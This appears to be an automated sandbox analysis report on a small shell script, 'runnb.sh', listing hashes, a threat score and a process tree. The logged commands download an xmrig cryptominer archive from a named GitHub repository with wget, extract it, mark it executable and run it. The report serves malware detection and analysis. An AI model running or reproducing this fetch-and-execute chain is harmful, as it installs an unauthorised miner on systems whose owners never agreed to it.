Analysis
-
max time kernel
0s -
max time network
1682s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
16-10-2024 23:37
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu1804-amd64-20240611-en
ubuntu-18.04-amd64
2 signatures
1800 seconds
Behavioral task
behavioral2
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240508-en
ubuntu-20.04-amd64
12 signatures
1800 seconds
Behavioral task
behavioral3
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240729-en
ubuntu-22.04-amd64
11 signatures
1800 seconds
General
-
Target
runnb.sh
-
Size
160B
-
MD5
87ea8773efcca67a4f2ce3e1ba1d1ff8
-
SHA1
0770e97785f007f7a3bc9d7e35a72b16895c366d
-
SHA256
765a3183613b556d32d8775fc21410c61d1565a372c27ed54193d4808b5cdb01
-
SHA512
df69c7a84df081850f4a1f72d78f65ddf61074fd4af7f989458cdc4273b5a64eeccb6864391ca780875e7b754834bbcbb17d550c4c9514101a8d3f45470ac514
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 1492 chmod -
Processes:
tardescription ioc Process File opened for reading /proc/filesystems tar
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:1483
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:1484
-
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:1491
-
-
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:1492
-
-
/tmp/xmrig./xmrig2⤵PID:1493
-